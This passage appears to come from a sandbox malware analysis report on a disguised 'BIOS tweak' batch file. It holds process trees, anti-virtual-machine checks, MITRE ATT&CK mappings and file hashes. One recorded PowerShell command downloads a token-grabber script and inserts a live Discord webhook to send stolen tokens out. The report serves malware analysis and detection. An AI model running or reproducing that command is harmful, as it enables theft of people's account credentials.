  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4944
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat"
  2⤵
  PID:2856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1332
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2080
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:3872
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat"
  2⤵
  PID:2100
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:5032
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2200
- C:\Windows\system32\rundll32.exe
  rundll32
  2⤵
  PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1233707392626196491/POiPovgH-x-rLoeA-lpzhTGoh16R1PRxceam9K22oclGbSMTc6l2SwNyyFLuwT1w4Uvs' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1440
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat"
  2⤵
  PID:3484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe99833cb8,0x7ffe99833cc8,0x7ffe99833cd8
  2⤵
  PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:3984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8
  2⤵
  PID:4060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:4508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:1284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:1408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
  2⤵
  PID:232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5428 /prefetch:8
  2⤵
  PID:4776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2108 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4644 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6536 /prefetch:8
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,2322804161325028533,2133567198347539950,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6396 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2920
- C:\Users\Admin\Downloads\OperaGXSetup.exe
  "C:\Users\Admin\Downloads\OperaGXSetup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Modifies system certificate store
  - NTFS ADS
  - Suspicious use of SetWindowsHookEx
  PID:4880
- - C:\Users\Admin\Downloads\OperaGXSetup.exe
    C:\Users\Admin\Downloads\OperaGXSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.62 --initial-client-data=0x2d8,0x2dc,0x2e0,0x2d4,0x2e4,0x74a94208,0x74a94214,0x74a94220
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5032
- - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe" --version
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2848
- - C:\Users\Admin\Downloads\OperaGXSetup.exe
    "C:\Users\Admin\Downloads\OperaGXSetup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=0 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=4880 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240428062114" --session-guid=32a967fb-4975-4969-85a5-3f9ffd4474ef --server-tracking-blob=OWY3YjY2MGNjNThmMzhmMWEzMjhhMWFmZTExYjMxNDQ0ZjBkOWRkZDAwNjY3NDJjZjRkMWIxNmQxNjUyMGNmYzp7ImNvdW50cnkiOiJHQiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL3d3dy5vcGVyYS5jb20vIiwiaW5zdGFsbGVyX25hbWUiOiJPcGVyYUdYU2V0dXAuZXhlIiwicHJvZHVjdCI6eyJuYW1lIjoib3BlcmFfZ3gifSwicXVlcnkiOiIvb3BlcmFfZ3gvc3RhYmxlL3dpbmRvd3M/dXRtX3NvdXJjZT1iaW5nJnV0bV9tZWRpdW09YmFfb3NlJnV0bV9jYW1wYWlnbj1PR1hfR0JfU2VhcmNoX0VOX1QxX0JyYW5kX1YyX21zYWRzJmh0dHBfcmVmZXJyZXI9aHR0cHMlM0ElMkYlMkZ3d3cub3BlcmEuY29tJTJGZ3glMkZneC1icm93c2VyJTNGdXRtX2lkJTNEJTI2dXRtX21lZGl1bSUzRHBhJTI2dXRtX3NvdXJjZSUzRGJpbmclMjZ1dG1fY2FtcGFpZ24lM0RPR1hfR0JfU2VhcmNoX0VOX1QxX0JyYW5kX1YyX21zYWRzJTI2bXNjbGtpZCUzRDFlZTUwZDhhMDZlNDEzY2M5YjFlNmJhN2VjMjI2ZDY4JnV0bV9zaXRlPW9wZXJhX2NvbSZ1dG1fbGFzdHBhZ2U9b3BlcmEuY29tJTJGZ3gtYnJvd3NlciZ1dG1faWQ9JmRsX3Rva2VuPTU2MTUxOTQyIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0Mjg1MjYxLjgwMzIiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOTAuMC40NDMwLjIxMiBTYWZhcmkvNTM3LjM2IEVkZy85MC4wLjgxOC42NiIsInV0bSI6eyJjYW1wYWlnbiI6Ik9HWF9HQl9TZWFyY2hfRU5fVDFfQnJhbmRfVjJfbXNhZHMiLCJpZCI6IiIsImxhc3RwYWdlIjoib3BlcmEuY29tL2d4LWJyb3dzZXIiLCJtZWRpdW0iOiJiYV9vc2UiLCJzaXRlIjoib3BlcmFfY29tIiwic291cmNlIjoiYmluZyJ9LCJ1dWlkIjoiYzNjYjFhZDUtNjUzMS00MjAwLWJjY2QtMzBlYTYwYWUwZDZhIn0= --desktopshortcut=1 --wait-for-package --initial-proc-handle=2809000000000000
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    PID:4988
  - - C:\Users\Admin\Downloads\OperaGXSetup.exe
      C:\Users\Admin\Downloads\OperaGXSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.62 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2a8,0x2e4,0x71794208,0x71794214,0x71794220
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"
    3⤵
    - Executes dropped EXE
    PID:4488
- - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\assistant_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\assistant_installer.exe" --version
    3⤵
    - Executes dropped EXE
    PID:4132
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\assistant_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202404280621141\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0x1184f48,0x1184f58,0x1184f64
      4⤵
      Executes dropped EXE
      PID:916
- C:\Users\Admin\Downloads\OperaGXSetup.exe
  "C:\Users\Admin\Downloads\OperaGXSetup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - NTFS ADS
  PID:4692
- - C:\Users\Admin\Downloads\OperaGXSetup.exe
    C:\Users\Admin\Downloads\OperaGXSetup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.62 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x72234208,0x72234214,0x72234220
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4972
- - C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe" --version
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4184

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:4860

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3484

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
1⤵
PID:988

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:5072

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\Users\Admin\AppData\Local\Temp\D132A4EB-2CAA-41DB-839A-563ECC4B76D7\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\D132A4EB-2CAA-41DB-839A-563ECC4B76D7\dismhost.exe {69772677-2AB7-485A-B3B7-2B9C16283B6C}
1⤵
- Drops file in Windows directory
PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E

Filesize
727B

MD5
72a000d2f2af4827a35eff6aa1dd09e0

SHA1
17c0e1f40ae5602a6c4d71d81468faeb4266348b

SHA256
cec7a0dd63d05cd2e48a3388b5384efcc48cca041ddffd1d8941470288924f25

SHA512
d6646ff7b31582366a2fe031cff0c9acceafca5c6b1d406ea45a79b2a8f786ed56e37990ab965d348e1098e42dbfc7d0ccb16eba50078055237f1fb6a4f07bbd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E

Filesize
404B

MD5
98f8a87e03478fdd99720ba85c41c814

SHA1
578e5db669c6de3226584543d3edda7a04462a78

SHA256
473771ca10a7c6e214a9c011f43c369689eed4e8817be1758552a38f2a3a35d3

SHA512
981c4bf8ea973ed790e401b5e0c85b36c0166dbae06b5c8f86e156d9d1e3fea46e27ddd1fc371a55d0082ca19830d6a76895208362aed652bc68e798576e9c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7915c5c12c884cc2fa03af40f3d2e49d

SHA1
d48085f85761cde9c287b0b70a918c7ce8008629

SHA256
e79d4b86d8cabd981d719da7f55e0540831df7fa0f8df5b19c0671137406c3da

SHA512
4c71eb6836546d4cfdb39cd84b6c44687b2c2dee31e2e658d12f809225cbd495f20ce69030bff1d80468605a3523d23b6dea166975cedae25b02a75479c3f217

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9faad3e004614b187287bed750e56acc

SHA1
eeea3627a208df5a8cf627b0d39561167d272ac5

SHA256
64a60300c46447926ce44b48ce179d01eff3dba906b83b17e48db0c738ca38a9

SHA512
a7470fe359229c2932aa39417e1cd0dc47f351963cbb39f4026f3a2954e05e3238f3605e13c870c9fe24ae56a0d07e1a6943df0e891bdcd46fd9ae4b7a48ab90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
3ca37391124f4e725790f5ba752db943

SHA1
27090c1fcfc584bea14d5d742f822df497fdfcb3

SHA256
e89f798bac96868df9cf2b999d1858f4f4f48d6739808e41966b0b2cb0e92ac5

SHA512
8a3197e0f0c6ea55898be83fbd149fc186fc86def9d454ded1cc2e1d1dd56782530846987a91837eacfc860cdb36a3eb7d012d012babffb15bc5ef14e6c13787

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
5KB

MD5
831f022fd857ed8ac9efec5d95f9cca4

SHA1
2bfe28e5d9b88d319509a4e15546f3a8fc34d42e

SHA256
c1bfeaff846479cff03d274ae1abfd3daf2ef55a28a1648dbeb94787094eb549

SHA512
b7b992de7c552efa498d8f55a1de4e373333d78bfc5a6fd405ca8e9127f04a6b224fd7cb0b7d1261866010f032aca24616f2f95fcb68878b4bf275ba08047f67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ab901feac41de9006bdb07670ebdb7d7

SHA1
b476ba7ed3c3ec29324a5fe2ad0080715b62df61

SHA256
54ca616591ebffda42a91d18aa89db8d114ed8c4d5d580de3365e582ba8ece08

SHA512
e0f40d835d411c850b13082ba3640551a5965b28cd39d77b776ad15b48ccea9ae1f5aa39ad73562edca79895628f9303ccd8166d29fa1ec6b93ae697101f89eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
75a5306b4351a64b8a327b301dd70c2c

SHA1
7cbd1047d81ef7020ded7a99eeac0de6c7e0ce15

SHA256
71d5b1dc0e4255608f12f8da4d3ef99e1b9edd839fd83c552b5ae0547730f94e

SHA512
